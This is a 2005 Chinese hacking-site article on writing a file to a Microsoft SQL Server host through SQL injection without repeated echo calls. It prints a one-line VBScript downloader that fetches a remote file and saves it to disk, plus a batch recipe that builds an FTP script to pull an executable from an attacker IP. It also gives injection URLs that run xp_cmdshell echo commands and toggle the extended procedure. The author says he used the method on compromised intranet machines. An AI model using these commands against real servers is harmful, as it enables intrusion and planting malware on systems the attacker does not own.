所属分类:安全文章 来源:情感网络 作者:xiaolu 日期:2005-1-22 16:15:27 阅读次数:     打印本页

Sql注射中参数多次调用Echo解决办法


    我是在黑哥Blog看到的他写的,先引用黑哥的:

Quote:

文/superhei 
解决办法: 
1.iget.vbs一次写入 
在vbs语句的接触是符号是: 所以我们iget.vbs可以这样写 

Set x= CreateObject("Microsoft.XMLHTTP"):x.Open "GET",LCase(WScript.Arguments(0)),0:x.Send():Set s = CreateObject("ADODB.Stream"):s.Mode = 3:s.Type = 1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 

这样我们可以一次echo成功,echo版本: 

echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open ^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s = CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type = 1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >iget.vbs 


2.bat调用ftp脚本的写法(by envymask) 

echo ftp>1.vbs 
echo open ip>2.vbs 
echo u>3.vbs 
echo s>4.vbs 
echo binary>5.vbs 
echo get 1.exe>6.vbs 
echo bay>7.vbs 

copy 1.vbs+2.vbs+3.vbs+4.vbs+5.vbs+6.vbs+7.vbs new.vbs 



    说说我的解决办法:

http://xxx.com/x.asp?id=1;Exec Master..xp_cmdshell 'echo xxxx1 > xxx.vbs';exec master..sp_dropextendedproc 'xp_cmdshell'--
http://xxx.com/x.asp?id=1;use master dbcc addextendedproc('xp_cmdshell','xplog70.dll')--
http://xxx.com/x.asp?id=1;Exec Master..xp_cmdshell 'echo xxxx2 >> xxx.vbs';exec master..sp_dropextendedproc 'xp_cmdshell'--
http://xxx.com/x.asp?id=1;use master dbcc addextendedproc('xp_cmdshell','xplog70.dll')--
.
.
.

    原理很清楚了,我写的sqlcomm.exe就是用的这个原理使命令只运行一次的,这个经过我严格的测试,我曾经echo过100多K的文件(exe2bat生成的文件)到内网肉鸡,成功使用Debug的还原成exe,建议配合我写的exe2vbs,呵呵,每行512个字符,努力做到最少行,最近废话多多,就此打住。


  • 上篇文章:智能ABC输入法溢出分析(2005-1-21 7:57:19)
  • 下篇文章:网吧--夹缝中生存(2005-1-23 15:41:24)
  • 相关文章
    上传多个文件到Ms sqlserver的image类型字段2004-12-19 20:44:06
    PHP+MySQL注入导出文件的新发现2004-12-8 18:24:41
    我收藏的Transact_SQL小手册,适合初学者2004-10-24 11:28:05
    MYSQL常用命令2004-10-20 4:35:43
    SQL数据库备份、还原、转移详解2004-9-26 4:24:34
    浅谈MYSQL跨库查询2004-9-17 13:40:47
    PHP-Nuke 7.4 SQL Injection Exploit2004-9-15 4:41:09
    How to execute system command in MSSQL2004-9-7 22:11:23
    Sql注射总结2004-9-3 23:59:27
    MySql ODBC驱动的使用2004-7-31 22:11:49


  • 联盟网站→[ 中国黑客联盟  |  网嗅网络 |  泰安铁通  |  小尤格斗界 ]